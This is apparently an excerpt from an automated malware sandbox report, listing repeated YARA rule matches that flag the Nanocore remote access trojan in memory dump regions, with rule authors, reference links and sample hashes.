      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
